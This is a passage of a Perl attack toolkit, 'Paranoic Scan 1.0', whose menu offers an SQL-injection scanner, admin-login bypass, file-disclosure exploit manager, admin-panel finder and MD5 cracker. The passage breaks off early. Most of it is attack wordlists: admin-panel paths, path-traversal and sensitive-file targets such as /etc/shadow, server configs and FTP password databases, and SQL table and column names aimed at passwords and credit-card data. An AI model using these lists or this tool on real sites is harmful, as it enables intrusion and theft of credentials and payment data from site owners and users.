Paranoic Scan 1.0 (Codigo NO identado)

1. #!usr/bin/perl
2. #Paranoic Scan 1.0
3. #Coded By Doddy H
4. #Necessary modules
5. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
6. #The arrays are a collection of several I found on the web
7.  
8. #Modules
9.  
10. use Digest::MD5 qw(md5_hex);
11. use Color::Output;
12. Color::Output::Init;
13.  
14. use LWP::UserAgent;
15. use IO::Socket;
16. use URI::Split qw(uri_split);
17. use HTML::LinkExtor;
18. use File::Basename;
19. use HTML::Form;
20. use URI::Escape;
21.  
22. ##
23.  
24. ##Arrays
25.  
26. my @paneles=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');
27.  
28. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
29. my @buscar1 =('usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','admin','tblUsers','tblAdmin','user','users','username','usernames','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');
30. my @buscar2 = ('name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');
31.  
32. ##
33.  
34. my $nave = LWP::UserAgent->new;
35. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
36. $nave->timeout(10);
37.  
38. ##Test Proxy
39.  
40. my $now_proxy;
41. my $te = getdatanownownownow();
42.  
43. if($te=~/proxy=(.*)/) {
44. $now_proxy = $1;
45. $nave->proxy("http","http://".$now_proxy);
46. }
47.  
48. ##
49.  
50. #Inicio
51.  
52. inicio_total();
53.  
54. sub inicio_total {
55.  
56. head_menu();
57.  
58. unless(-f "data.txt") {
59. instalar();
60. } else {
61. #Start the menu
62. my $re = menu_login();
63. printear("\n\n\t\t\t[+] Checking ...\n","text","7","5");
64. sleep(3);
65. if($re eq "yes") {
66. estoydentro();
67. } else {
68. printear("\n\n\t\t\t[-] Bad Login\n\n\n","text","5","5");
69. <stdin>;
70. inicio_total();
71. }
72. }
73. copyright_menu();
74. }
75.  
76. #Final
77.  
78. sub estoydentro {
79. head_menu();
80. menu_central();
81. my $op  = printear("\n\n\t\t\t[+] Option : ","stdin","11","13");
82. $SIG{INT} = \&estoydentroporahora;  ## Comment on this line to compile to exe
83. if($op eq "1") {
84. load_paranoic_old();
85. }
86. elsif($op eq "2") {
87. load_kobra();
88. }
89. elsif($op eq "3") {
90. load_bypass();
91. }
92. elsif($op eq "4") {
93. load_fsd();
94. }
95. elsif($op eq "5") {
96. load_findpaths();
97. }
98. elsif($op eq "6") {
99. load_locateip();
100. }
101. elsif($op eq "7") {
102. menu_crackhash();
103. printear("\n\n[+] Finished\n\n","text","13","5");
104. <stdin>;
105. estoydentro();
106. }
107. elsif($op eq "8") {
108. clean();
109. start_panel();
110. }
111. elsif($op eq "9") {
112. load_cmd();
113. }
114. elsif($op eq "10") {
115. head_menu();
116. printear("\n\n\t\tThis program was coded By Doddy H in the year 2012\n\n\n\n","text","13","5");
117. <stdin>;
118. estoydentro();
119. }
120. elsif($op eq "11") {
121. my $op  = printear("\n\n\n\t\t\t[+] Good Bye","stdin","7","13");
122. #<stdin>;
123. exit(1);
124. }
125. else {
126. estoydentro();
127. }#Fin de control
128. }
129.  
130. sub estoydentroporahora {
131. my $op  = printear("\n\n\n\t\t[+] Press any key for return to the menu","stdin","7","13");
132. #<stdin>;
133. estoydentro(); 
134. }
135.  
136. sub menu_central {
137. printear("\n\n\t\t\t -- == Options == --\n\n","text","13","5");
138. printear("\n
139. \t\t\t[+] 1 : Web Scanner\n
140. \t\t\t[+] 2 : SQLi Scanner\n
141. \t\t\t[+] 3 : Bypass Admin\n
142. \t\t\t[+] 4 : FSD Exploit Manager\n
143. \t\t\t[+] 5 : Paths Finder\n
144. \t\t\t[+] 6 : Locate IP\n
145. \t\t\t[+] 7 : Crack MD5\n
146. \t\t\t[+] 8 : Panel Finder\n
147. \t\t\t[+] 9 : CMD\n
148. \t\t\t[+] 10 : About\n
149. \t\t\t[+] 11 : Exit\n
150. ","text","13","5");
151. }
152.  
153. sub menu_login {
154.  
155. my $test_username = "";
156. my $test_password = "";
157.  
158. printear("\n\n\t\t\t-- == Login == --\n\n\n\n","text","13","5");
159. my $username  = printear("\t\t\t[+] Username : ","stdin","11","13");
160. my $password  = printear("\n\t\t\t[+] Password : ","stdin","11","13");
161.  
162. my $word = getdatanownownownow();
163.  
164. if($word=~/username=(.*)/) {
165. $test_username = $1;
166. }
167.  
168. if($word=~/password=(.*)/) {
169. $test_password = $1;
170. }
171.  
172. if($test_username eq md5_hex($username) and $test_password eq md5_hex($password)) {
173. return "yes";
174. } else {
175. return "no";
176. }
177.  
178. }
179.  
180. sub instalar {
181. printear("\n\n\t\t\t-- == Program settings == --\n\n\n\n","text","13","5");
182.  
183. my $username  = printear("\t\t\t[+] Username : ","stdin","11","13");
184. my $password  = printear("\n\t\t\t[+] Password : ","stdin","11","13");
185. my $proxy  = printear("\n\t\t\t[+] Proxy : ","stdin","11","13");
186. my $colores  = printear("\n\t\t\t[+] Colors [y,n] : ","stdin","11","13");
187.  
188. open(FILE,">>data.txt");
189. print FILE "username=".md5_hex($username)."\n";
190. print FILE "password=".md5_hex($password)."\n";
191. if($proxy ne "") {
192. print FILE "proxy=".$proxy."\n";
193. }
194. print FILE "colors=".$colores."\n";
195. close FILE;
196.  
197. inicio_total();
198. }
199.  
200. sub head_menu {
201. clean();
202. printear("
203.  
204.  
205. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
206. @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
207. @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
208. @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
209. @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
210. @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
211. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @
212.  
213.  
214. ","text","11","5");
215.  
216.  
217. printear("
218.  
219.                                          
220.                                          
221. \t\t                 ¾¾¾¾¾¾¾¾¾¾¾              
222. \t\t              ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
223. \t\t            ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
224. \t\t          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
225. \t\t          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
226. \t\t         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
227. \t\t        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
228. \t\t        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
229. \t\t        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
230. \t\t         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
231. \t\t         ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾      
232. \t\t          ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾      
233. \t\t           ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
234. \t\t           ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾        
235. \t\t            ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾        
236. \t\t            ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾        
237. \t\t            ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
238. \t\t                 ¾¾¾¾¾¾¾¾¾¾¾¾¾              
239. \t\t               ¾  ¾¾¾¾¾¾¾¾¾¾  ¾            
240. \t\t               ¾    ¾ ¾¾¾¾ ¾  ¾            
241. \t\t               ¾ ¾¾          ¾¾            
242. \t\t      ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾            
243. \t\t     ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾    
244. \t\t     ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾  
245. \t\t     ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
246. \t\t      ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾  
247. \t\t               ¾¾¾¾¾¾     ¾¾¾¾¾¾¾          
248. \t\t                  ¾¾¾¾¾¾¾¾¾¾¾¾              
249. \t\t                   ¾¾¾¾¾¾¾¾¾                
250. \t\t                ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾            
251. \t\t            ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾        
252. \t\t        ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾  
253. \t\t   ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
254. \t\t   ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
255. \t\t    ¾¾¾¾                             ¾¾¾¾  
256.                                          
257.                                          
258.                                          
259.  
260.  
261. ","text","7","5");
262.  
263. }
264.  
265. sub printear { #
266. my $test;
267. my $word = getdatanownownownow();
268.  
269. if($word=~/colors=(.*)/) {
270. $test= $1;
271. }
272. if($test eq "y") {
273. if ($_[1] eq "text") {
